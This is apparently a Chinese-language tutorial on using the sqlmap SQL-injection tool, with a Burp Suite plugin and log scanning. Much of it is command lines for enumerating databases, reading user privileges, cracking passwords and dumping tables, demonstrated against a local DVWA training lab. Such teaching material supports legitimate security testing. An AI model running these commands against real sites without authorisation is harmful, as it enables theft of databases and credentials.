插件方式
设置只要在:extender-->extentions-->add 添加jar就OK了!
不过需要BurpSuite需要放到sqlmap根目录下!
本插件实现原理:
将目标请求的数据存放到临时文件中,然后调用
"sqlmap.py -r $file"来启动对请求的sql注入检测 在Sqlmap tab中,你可以配置sqlmap除 -r外的其他参数,比如:
加入配置中写:"--level 3",真实执行时是:sqlmap.py -r $file --level 3
sqlmap结合burpsuite注入
抓包
sqlmap检测:sqlmap.py -r burpsuite抓包.txt
回到burpsuite主页面,在任何请求连接上右键,会看到新增"send to Sqlmap",点击后会开启cmd窗口,针对此请求进行sql注入检测
设置sqlmap参数:
另一种方式
image.png使用sqlmap对log进行测试
python sqlmap.py -l D:\log\log1.txt --batch
_____PS:加batch是为能自动选择Yes
image.png
401 (Unauthorized) - 1 times
[18:08:41] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\Administrator\AppData\Local\sqlmap\output\results-06042021_0607pm.csv'
生成文件
执行
image.png常见命令
sqlmap -hh
sqlmap.py -u "[URL]" 或 sqlmap.py -r "[数据包_path]"
sqlmap.py -u "[URL]" –dbs //获取数据库
sqlmap.py -u "[URL]" --current-db //获取当前数据库名
sqlmap.py -u "[URL]" --current-user //获取当前数据库的用户名
sqlmap.py -u "[URL]" --tables //获取数据的所有表名
sqlmap.py -u "[URL]" --tables -D [数据库名] //获取指定数据库中的所有表名
sqlmap.py -u "[URL]" --column -T [表名] -D [数据库名] //获取指定表中的列字段
sqlmap.py -u "[URL]" --dump -C [列名] -T [表名] -D [数据库名] //爆指定列中的字段
sqlmap.py -u "[URL]" --privileges //查看当前数据库的用户权限
sqlmap.py -u "[URL]" --password //爆数据库的密码
sqlmap.py -u "[URL]" --is-dba -v 1 //看有没有数据库管理员权限
示例
#查看所有的数据库
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4iij3d2sluivmqejvpvi88tpd7" --dbs
#查看当前的数据库名称
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4iij3d2sluivmqejvpvi88tpd7" --current-db
#查看当前库所有表格
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4iij3d2sluivmqejvpvi88tpd7" --batch -D dvwa --tables
#查看表数据格式
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4iij3d2sluivmqejvpvi88tpd7" --batch -D dvwa -T users --columns
#查看数据库中的指定表格数据
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4iij3d2sluivmqejvpvi88tpd7" --batch -D dvwa -T users -C "user,password" --dump
增值学习资料
sqlmap 内核分析 原理分析
网址:
anquanke.com/subject/id/160641
sqlmap 的一些字典
E:\ProgramData\Anaconda3\Lib\site-packages\sqlmap\data\txt
'mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME'
sqlmap -d "mysql://用户名:密码@localhost:端口号/user" -f --banner --dbs --users
扩展版本
github.com/s0md3v/sqlmate
码云地址;gitee.com/dasssa/sqlmate
网友评论